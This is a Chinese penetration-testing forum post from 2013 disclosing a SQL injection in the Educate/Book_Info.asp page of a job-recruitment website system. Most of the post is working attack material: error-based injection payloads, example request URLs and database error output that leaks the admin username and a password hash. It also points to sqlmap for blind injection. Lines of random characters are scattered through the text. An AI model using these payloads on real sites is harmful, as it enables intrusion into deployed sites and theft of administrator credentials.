中国网络渗透测试联盟
标题:
网络求职招聘人才网站系统正式版注入
[打印本页]
作者:
admin
时间:
2013-2-16 21:44
标题:
网络求职招聘人才网站系统正式版注入
漏洞出现在Educate/Book_Info.asp
. i2 V9 ~* Z0 W( V( Y
9 ?8 ~, @# ?2 I; G2 @
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
# X+ [ W2 ? v
% \" ~2 }8 E* e5 A) i
exp:如下
( g, C9 @8 X' f! Y4 s' e- e% p0 d
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
( J" y2 n* Q: L6 c1 p- ]
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
" G" f0 ~! a3 F) Q3 k
: u) ^3 s" a8 c* V
http://www.xxx.com
/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
) ~. B/ W) ~8 z2 E
) c5 C. K5 C. u3 K
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
% s' t/ V8 v; Q. L+ m% |) C. W
) x- ]7 V- x- D% B# _' x7 {
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
" r# a. q- p% _) g# U% Y
( z( o( h$ H; Z. D" f% |
/Educate/Book_Info.asp,行 8
5 b$ e6 s! Z* h0 {
& m2 N$ Y# h3 X2 ]2 n* F* ~
http://www.xxx.com
/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
% x5 M6 n6 u' r) E9 G5 x3 _
/ X/ r) D1 F6 u% ~& q6 B6 I
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
5 ~% W) C0 ]) V- ^& _/ R
}; k; w& [( z9 `$ y$ u
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
& `* T: [+ b5 L% H
) F( q @% ]* ]
/Educate/Book_Info.asp,行 8
% G# G3 z# A; z' t+ C' ^6 x" c
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2